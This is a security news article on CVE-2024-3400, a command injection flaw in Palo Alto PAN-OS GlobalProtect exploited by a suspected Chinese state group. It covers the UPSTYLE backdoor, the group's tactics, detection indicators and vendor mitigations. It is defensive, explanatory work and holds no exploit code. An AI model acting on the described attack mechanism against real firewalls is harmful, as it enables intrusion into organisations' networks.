CVE-2024-3400: Palo Alto PAN-OS RCE Exploited by State Actors

A sophisticated campaign attributed to Chinese state-sponsored actors has been observed exploiting a critical Zero-Day vulnerability in Palo Alto Networks PAN-OS software. The flaw, tracked as CVE-2024-3400, is a command injection vulnerability in the GlobalProtect gateway feature that allows unauthenticated attackers to achieve RCE with root privileges. According to SecurityWeek, the exploitation follows a pattern consistent with APT groups focused on high-value targets, including government agencies and critical infrastructure.

Technical Analysis of CVE-2024-3400 Exploitation

The vulnerability exists because the PAN-OS CVE fails to properly sanitize input when processing session IDs while device telemetry is enabled. An attacker can send a specifically crafted request to the GlobalProtect gateway, leading to the creation of a file with root ownership. This file can then be leveraged to execute commands on the underlying operating system.

Security researchers from Volexity and Mandiant (tracking the activity as UNC5325) have observed the deployment of a custom Python-based backdoor known as ‘UPSTYLE’. This backdoor is designed to maintain persistence and facilitate Lateral Movement within the victim’s environment. The attackers utilize a multi-stage approach, often performing initial reconnaissance before deploying more permanent C2 infrastructure. Once root access is achieved, the threat actor can exfiltrate sensitive configuration data, session tokens, and credentials from the device memory.

UNC5325 Threat Actor TTPs and Attribution

While Palo Alto Networks has not explicitly named a specific nation-state, the TTP profile aligns with known Chinese operations. These actors frequently target perimeter devices—such as firewalls and VPN concentrators—because they often lack traditional EDR coverage and provide a stable entry point for further network penetration. The use of specialized malware like UPSTYLE indicates a high level of preparation. The actors have also been observed attempting to bypass detection by clearing logs and modifying system files to hide their presence, complicating the work of a SOC during incident response.

How to Detect CVE-2024-3400 Exploit Patterns

Defenders should prioritize the analysis of firewall logs for unusual outbound connections or unauthorized file creation in the /var/appweb/ssldocs/ directory. Because the exploit leverages the device telemetry service, searching for anomalous telemetry traffic or unexpected modifications to telemetry configuration files is a primary way to detect CVE-2024-3400 exploit activity. Additionally, security teams should look for IoC markers associated with the UPSTYLE backdoor, such as specific Python scripts running with elevated privileges.

Integrating firewall logs into a SIEM for automated correlation can help identify the initial stages of Privilege Escalation that occur after the command injection. Mapping these actions against the MITRE ATT&CK framework highlights that the actors are primarily utilizing ‘Exploit Public-Facing Application’ (T1190) and ‘External Remote Services’ (T1133) for initial access.

Palo Alto PAN-OS Command Injection Mitigation

The most effective Palo Alto PAN-OS command injection mitigation is the immediate application of the hotfixes released by the vendor for PAN-OS versions 10.2, 11.0, and 11.1. For organizations unable to patch immediately, Palo Alto Networks recommends disabling device telemetry as a temporary measure. However, it is important to verify that disabling telemetry does not impact other monitoring functions required for compliance.

Security leaders should also review their Zero Trust architecture to ensure that even if a perimeter device is compromised, the impact on internal resources is minimized through strict segmentation and identity-based access controls.